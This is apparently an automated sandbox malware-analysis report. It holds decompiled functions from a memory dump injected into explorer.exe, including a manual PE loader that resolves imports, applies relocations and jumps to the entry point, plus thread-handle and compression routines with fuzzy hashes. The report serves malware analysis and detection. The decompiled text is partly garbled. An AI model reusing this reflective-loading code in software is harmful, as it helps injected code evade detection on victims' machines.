						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E00094AF0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x84e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E00094C30( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x84e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E00094C30(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x84e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x84e85000
							E00095D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E00094AF0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x84e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}






















































                  0x00092d76
                  0x00092d7b
                  0x00092d7f
                  0x00092d82
                  0x00092d82
                  0x00092d85
                  0x00092d8a
                  0x00092d8f
                  0x00092d92
                  0x00092d97
                  0x00092d9a
                  0x00092da0
                  0x00092da0
                  0x00092dab
                  0x00092dae
                  0x00092db5
                  0x00092dba
                  0x00000000
                  0x00000000
                  0x00092dc0
                  0x00092dc5
                  0x00092dc5
                  0x00092dca
                  0x00092dd0
                  0x00092dda
                  0x00092ddf
                  0x00092de5
                  0x00092e04
                  0x00092e07
                  0x00092e12
                  0x00092e12
                  0x00092e12
                  0x00092e09
                  0x00092e09
                  0x00092e0b
                  0x00000000
                  0x00092e0d
                  0x00092e0d
                  0x00092e0d
                  0x00092e0b
                  0x00092e1a
                  0x00092e1f
                  0x00092e24
                  0x00092e2a
                  0x00092e2e
                  0x00092e31
                  0x00092e34
                  0x00092e3a
                  0x00092e3f
                  0x00092e42
                  0x00092e48
                  0x00092e4d
                  0x00092e53
                  0x00092e59
                  0x00092e5e
                  0x00092e61
                  0x00092e66
                  0x00092e6a
                  0x00092e6e
                  0x00092e71
                  0x00092e74
                  0x00092e7d
                  0x00092e84
                  0x00092e87
                  0x00092e8a
                  0x00092e8f
                  0x00092e94
                  0x00092e97
                  0x00092e9a
                  0x00092e9a
                  0x00092e9e
                  0x00092ea7
                  0x00092eae
                  0x00092eb1
                  0x00092eb6
                  0x00092ebb
                  0x00092ebb
                  0x00092ebe
                  0x00092ec3
                  0x00000000
                  0x00000000
                  0x00092de7
                  0x00092de9
                  0x00092df6
                  0x00000000
                  0x00000000
                  0x00092df6
                  0x00092de9
                  0x00000000
                  0x00092de5
                  0x00092ec9
                  0x00092ece
                  0x00092ed1
                  0x00092ed4
                  0x00092f7f
                  0x00092f7f
                  0x00092eda
                  0x00092eda
                  0x00092eda
                  0x00092edf
                  0x00092f09
                  0x00092f0c
                  0x00092f0c
                  0x00092f11
                  0x00092f13
                  0x00092f15
                  0x00092f18
                  0x00092f1b
                  0x00092f23
                  0x00092f28
                  0x00092f28
                  0x00092f2e
                  0x00092f31
                  0x00092f34
                  0x00092f37
                  0x00092f39
                  0x00092f39
                  0x00092f3a
                  0x00092f3a
                  0x00092f37
                  0x00092f48
                  0x00092f4b
                  0x00092f4f
                  0x00092f54
                  0x00092f57
                  0x00092f5a
                  0x00092f5a
                  0x00092f5a
                  0x00092f5d
                  0x00092f5d
                  0x00092f60
                  0x00092f60
                  0x00092ee1
                  0x00092ee1
                  0x00092ef1
                  0x00092ef4
                  0x00092ef9
                  0x00092ef9
                  0x00092efc
                  0x00092eff
                  0x00092f02
                  0x00092f04
                  0x00092f04
                  0x00092f63
                  0x00092f65
                  0x00092f68
                  0x00092f68
                  0x00092f6e
                  0x00092f72
                  0x00092f75
                  0x00092f77
                  0x00092f77
                  0x00092f88
                  0x00092f8a
                  0x00092f8a
                  0x00092f92
                  0x00092fa0
                  0x00092fa3
                  0x00092fa5
                  0x00092fc5
                  0x00092fc5
                  0x00092fc8
                  0x00092fce
                  0x00092fcf
                  0x00092fd2
                  0x00092fd4
                  0x00092fd7
                  0x00092fda
                  0x00092fdd
                  0x00092fe1
                  0x00092fe4
                  0x00092fe7
                  0x00092fea
                  0x00092fec
                  0x00092fec
                  0x00092fef
                  0x00092ff1
                  0x00092ff1
                  0x00092ff4
                  0x00092ff6
                  0x00092ff9
                  0x00093001
                  0x00093004
                  0x00093009
                  0x00093009
                  0x0009300f
                  0x00093012
                  0x00093015
                  0x00093017
                  0x00093017
                  0x00093018
                  0x00093018
                  0x00093023
                  0x00093023
                  0x00093023
                  0x00093026
                  0x00093029
                  0x00093029
                  0x0009302c
                  0x0009302c
                  0x00092fef
                  0x0009302f
                  0x00093032
                  0x00093035
                  0x00093037
                  0x0009303a
                  0x0009303c
                  0x0009303f
                  0x00093042
                  0x00093044
                  0x00093047
                  0x0009304f
                  0x00093057
                  0x0009305a
                  0x0009305a
                  0x0009305a
                  0x0009305d
                  0x0009305d
                  0x0009305d
                  0x00093060
                  0x00093066
                  0x00093068
                  0x00093068
                  0x0009306e
                  0x00093074
                  0x0009307d
                  0x00093084
                  0x00093086
                  0x00093089
                  0x00093089
                  0x0009308c
                  0x0009308c
                  0x0009308f
                  0x00093091
                  0x00093094
                  0x00093096
                  0x000930b1
                  0x000930b1
                  0x000930b5
                  0x000930b8
                  0x000930bb
                  0x000930be
                  0x000930d4
                  0x000930d4
                  0x000930d4
                  0x000930c0
                  0x000930c0
                  0x000930c2
                  0x000930c6
                  0x000930c9
                  0x00000000
                  0x000930cb
                  0x000930cb
                  0x000930cd
                  0x00000000
                  0x000930cf
                  0x000930cf
                  0x000930cf
                  0x000930cd
                  0x000930c9
                  0x000930d8
                  0x000930db
                  0x000930e0
                  0x000930ea
                  0x000930ea
                  0x000930ea
                  0x000930ed
                  0x00093098
                  0x00093098
                  0x0009309a
                  0x000930a1
                  0x000930a1
                  0x000930a3
                  0x000930a5
                  0x000930a7
                  0x000930ab
                  0x000930ad
                  0x000930af
                  0x00000000
                  0x00000000
                  0x000930af
                  0x000930ab
                  0x0009309c
                  0x0009309c
                  0x0009309f
                  0x00000000
                  0x00000000
                  0x0009309f
                  0x0009309a
                  0x000930f7
                  0x000930f9
                  0x000930f9
                  0x00093104
                  0x00092fa7
                  0x00092fa7
                  0x00092faa
                  0x00000000
                  0x00092fac
                  0x00092fac
                  0x00092fae
                  0x00092fb2
                  0x00000000
                  0x00092fb4
                  0x00092fb4
                  0x00092fb4
                  0x00092fb7
                  0x00000000
                  0x00092fbb
                  0x00092fc4
                  0x00092fc4
                  0x00092fb7
                  0x00092fb2
                  0x00092faa
                  0x00092f96
                  0x00092f9f
                  0x00092f9f

                  APIs
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID:
                  • API String ID: 3510742995-0
                  • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                  • Instruction ID: 185e7931b200b5f00758bf730992471f6333a59919987fd71983e5a0ce0181f8
                  • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                  • Instruction Fuzzy Hash: 74D11271A00B049FCB68CF69D8D4AAAB7F1FF88304B24892DE88AC7741D771E9449B54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00092AEC, Relevance: 6.2, APIs: 4, Instructions: 219libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 52%
                  			E00092AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}





























                  0x00092afb
                  0x00092b01
                  0x00092b0a
                  0x00092b0d
                  0x00092b10
                  0x00000000
                  0x00092c01
                  0x00092c05
                  0x00092c07
                  0x00092c15
                  0x00092d33
                  0x00092d3c
                  0x00092d3f
                  0x00092d43
                  0x00092d49
                  0x00092d51
                  0x00092d51
                  0x00092d59
                  0x00000000
                  0x00092d64
                  0x00092c1b
                  0x00092c24
                  0x00092c32
                  0x00092c35
                  0x00092c52
                  0x00092c59
                  0x00092c6b
                  0x00092c6b
                  0x00092c72
                  0x00092c82
                  0x00092c9a
                  0x00092c84
                  0x00092c8c
                  0x00092c8c
                  0x00092c9d
                  0x00092ca1
                  0x00092cb1
                  0x00092cd4
                  0x00092ce6
                  0x00092cb3
                  0x00092cc7
                  0x00092cc7
                  0x00092cf0
                  0x00092d0c
                  0x00092cf2
                  0x00092d01
                  0x00092d01
                  0x00092d14
                  0x00092d1d
                  0x00092d1d
                  0x00092d2b
                  0x00000000
                  0x00092c74
                  0x00092c76
                  0x00000000
                  0x00092c76
                  0x00092c72
                  0x00000000
                  0x00092c35
                  0x00092b18
                  0x00092b26
                  0x00092b2b
                  0x00092b36
                  0x00092b39
                  0x00092b3d
                  0x00092b3f
                  0x00092b4f
                  0x00092b58
                  0x00092b61
                  0x00092b69
                  0x00092b72
                  0x00092b7d
                  0x00092b83
                  0x00092b86
                  0x00092b89
                  0x00092b90
                  0x00092b97
                  0x00000000
                  0x00000000
                  0x00092ba2
                  0x00092bb0
                  0x00092bbb
                  0x00092bc5
                  0x00092bdd
                  0x00092bea
                  0x00092bea
                  0x00092bc7
                  0x00092bd2
                  0x00092bd2
                  0x00092bf1
                  0x00092bf1
                  0x00092bf9
                  0x00092bf9
                  0x00000000

                  APIs
                  • GetModuleHandleA.KERNEL32(?), ref: 00092C4C
                  • LoadLibraryA.KERNEL32(?), ref: 00092C65
                  • GetProcAddress.KERNEL32(00000000,890CC483), ref: 00092CC1
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00092CE0
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AddressProc$HandleLibraryLoadModule
                  • String ID:
                  • API String ID: 384173800-0
                  • Opcode ID: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
                  • Instruction ID: f71a99207cef5de23c8ddc2f8d773f6edabddc3cd5bada4ad458651b88394428
                  • Opcode Fuzzy Hash: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
                  • Instruction Fuzzy Hash: E4A17AB5A01209EFCF54CFA8C885AADBBF1FF08314F148459E815AB351D734AA81DF64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00081C68, Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                  Download Yara Rule
                  C-Code - Quality: 75%
                  			E00081C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0x9e6dc; // 0x1e4
				_t13 = E0008A4BF(_t41, 0);
				while(_t13 < 0) {
					E0008980C( &_v28);
					_t43 =  *0x9e6e0; // 0x0
					_t15 =  *0x9e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0x9e684; // 0x40f8f0
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x9e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0x9e684; // 0x40f8f0
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0x9e6dc; // 0x1e4
						__eflags = 0;
						_t13 = E0008A4BF(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0x9e6e8; // 0x40fd78
				_v28 = _t20;
				_t22 = E0008A6A9(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x9e6d0, 0, 0, 2);
					E0008980C(0x9e6e0);
					_t64 = E00081A1B( &_v28, E00081226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0x9e760);
						_t51 = 0x27;
						E00089F06(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0x9e684; // 0x40f8f0
				 *((intOrPtr*)(_t29 + 0x30))( *0x9e6d0);
				_t48 =  *0x9e6dc; // 0x1e4
				 *0x9e6d0 = 0;
				E0008A4DB(_t48);
				E0008861A( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

























                  0x00081c68
                  0x00081c75
                  0x00081c77
                  0x00081c7e
                  0x00081ce4
                  0x00081c8b
                  0x00081c90
                  0x00081c96
                  0x00081c9b
                  0x00081ca1
                  0x00081ca3
                  0x00081ca7
                  0x00081d15
                  0x00081d17
                  0x00081d99
                  0x00081d9f
                  0x00081d9f
                  0x00081ca9
                  0x00081cb1
                  0x00081cb1
                  0x00081cbd
                  0x00081cc3
                  0x00081cc5
                  0x00000000
                  0x00000000
                  0x00081cc7
                  0x00081cd1
                  0x00081cd7
                  0x00081cdd
                  0x00081cdf
                  0x00000000
                  0x00081cdf
                  0x00081cab
                  0x00081caf
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00081caf
                  0x00081cee
                  0x00081cef
                  0x00081cf0
                  0x00081cf1
                  0x00081cf2
                  0x00081cf7
                  0x00081d01
                  0x00081d06
                  0x00081d0e
                  0x00081d29
                  0x00081d2c
                  0x00081d36
                  0x00081d41
                  0x00081d54
                  0x00081d56
                  0x00081d58
                  0x00081d5a
                  0x00081d5b
                  0x00081d63
                  0x00081d64
                  0x00081d6a
                  0x00081d10
                  0x00081d10
                  0x00081d10
                  0x00081d6b
                  0x00081d76
                  0x00081d79
                  0x00081d7f
                  0x00081d85
                  0x00081d90
                  0x00081d97
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7af54bf47eeafca49fec7a466d95b770275a6c99f1a555b29a304e1941eb5a54
                  • Instruction ID: b7eecfca9752b51bd3878614f3e3ca223f58aa9d07610ca166e7e1ee13e62024
                  • Opcode Fuzzy Hash: 7af54bf47eeafca49fec7a466d95b770275a6c99f1a555b29a304e1941eb5a54
                  • Instruction Fuzzy Hash: A431C232604340AFE754FFA4EC859AA77ADFB943A0F54092BF581C32E2DE389C058756
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00081B2D, Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON
                  Download Yara Rule
                  C-Code - Quality: 73%
                  			E00081B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0x9e6f4; // 0x1e0
				_t12 = E0008A4BF(_t38, 0);
				while(_t12 < 0) {
					E0008980C( &_v28);
					_t40 =  *0x9e700; // 0x0
					_t14 =  *0x9e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0x9e684; // 0x40f8f0
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x9e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0x9e684; // 0x40f8f0
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0x9e6f4; // 0x1e0
								__eflags = 0;
								_t12 = E0008A4BF(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E0008980C(0x9e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x9e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0x9e6e8; // 0x40fd78
				_v28 = _t24;
				_t61 = E00081A1B( &_v28, E0008131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0x9e760);
					_t48 = 0x27;
					E00089F06(_t48);
				}
				if(_v24 != 0) {
					E00086890( &_v24);
				}
				_t26 =  *0x9e684; // 0x40f8f0
				 *((intOrPtr*)(_t26 + 0x30))( *0x9e6ec);
				_t28 =  *0x9e758; // 0x0
				 *0x9e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0x9e6f4; // 0x1e0
				 *0x9e758 =  !=  ? 1 : _t28;
				E0008A4DB(_t46);
				_t15 = _t61;
				goto L12;
			}
























                  0x00081b2d
                  0x00081b33
                  0x00081b41
                  0x00081baf
                  0x00081b4e
                  0x00081b53
                  0x00081b59
                  0x00081b5e
                  0x00081b64
                  0x00081b66
                  0x00081b6a
                  0x00081c64
                  0x00081c64
                  0x00081b70
                  0x00081b70
                  0x00081b7c
                  0x00081b7c
                  0x00081b88
                  0x00081b8e
                  0x00081b90
                  0x00000000
                  0x00081b92
                  0x00081b92
                  0x00081b9c
                  0x00081ba2
                  0x00081ba8
                  0x00081baa
                  0x00000000
                  0x00081baa
                  0x00081b72
                  0x00081b72
                  0x00081b76
                  0x00000000
                  0x00000000
                  0x00000000
